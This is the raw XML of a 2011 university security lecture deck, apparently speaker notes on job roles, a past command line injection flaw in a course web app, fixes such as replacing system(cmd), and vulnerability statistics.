                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Saakashvili</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>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kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Information Security Analyst</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Incident Responder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="0" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Network Security Engineer,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="0" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Chief Information Security Officer,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="0" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Information Security Architect,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="0" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Forensic Analyst,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="0" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>System, Network and Web Penetration Tester,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="0" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Information Security Forensics Expert,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="0" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Malware Analyst,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="0" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Computer Crime Investigator.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="0" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>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kern="1200" baseline="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Mitre</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="0" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> just posted hiring of INFOSEC Engineer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="1" i="0" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{20A3EF14-F589-435C-83BC-40BAE6CE08AB}" type="datetime8">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>8/19/2011 2:36 PM</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E9516E1B-70A2-475D-87CB-BD13E0E584E7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3833608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followed the format of the famous paper “Smashing The Stack for Fun and profit,” by Aleph One (aka Elias Levy) https://athena.uccs.edu/ictf/images/b/bc/Hacking_the_Midterm_rev2.ppt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>I have used the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" baseline="0" dirty="0" smtClean="0"/>
              <a:t> script for 13 years!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{20A3EF14-F589-435C-83BC-40BAE6CE08AB}" type="datetime8">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>8/19/2011 2:36 PM</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E9516E1B-70A2-475D-87CB-BD13E0E584E7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1887291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called Command Line Injection!</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Created and used 1995. a pioneer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> web app effort</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Other logic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> error. Should check the login/password first before allow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>mkdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Replace system(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>) with more specific function calls.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{20A3EF14-F589-435C-83BC-40BAE6CE08AB}" type="datetime8">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>8/19/2011 2:36 PM</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E9516E1B-70A2-475D-87CB-BD13E0E584E7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2587210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Rats</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> cover c, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>c++</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>perl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>, python. Mike added extension to Ruby.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://projects.webappsec.org/w/page/13246989/Web%20Application%20Security%20Statistics</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The statistics includes data about 12186 web applications with 97554 detected vulnerabilities of different risk levels. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>19</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> deadline</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> sins of software security</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{20A3EF14-F589-435C-83BC-40BAE6CE08AB}" type="datetime8">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>8/19/2011 2:36 PM</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E9516E1B-70A2-475D-87CB-BD13E0E584E7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3739180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handle this after the exam. How to notify users, how to make sure no </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>trojan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> being planted in user home directories?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{20A3EF14-F589-435C-83BC-40BAE6CE08AB}" type="datetime8">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>8/19/2011 2:36 PM</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E9516E1B-70A2-475D-87CB-BD13E0E584E7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2316224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972560" y="8774271"/>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sz="2400" i="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="2400" i="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="2400" i="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="2400" i="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="2400" i="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2514600" indent="-228600" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2400" i="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2971800" indent="-228600" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2400" i="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3429000" indent="-228600" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2400" i="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3886200" indent="-228600" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2400" i="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="r"/>
            <a:fld id="{6732E2BF-A78C-44E6-A431-7A5A921011EB}" type="slidenum">
              <a:rPr lang="en-US" sz="1200" i="0"/>
              <a:pPr algn="r"/>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" i="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hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://cs.uccs.edu/~cs691/studentproj/projM2011/eashary/doc/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> 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972560" y="8774271"/>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sz="2400" i="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="2400" i="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="2400" i="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
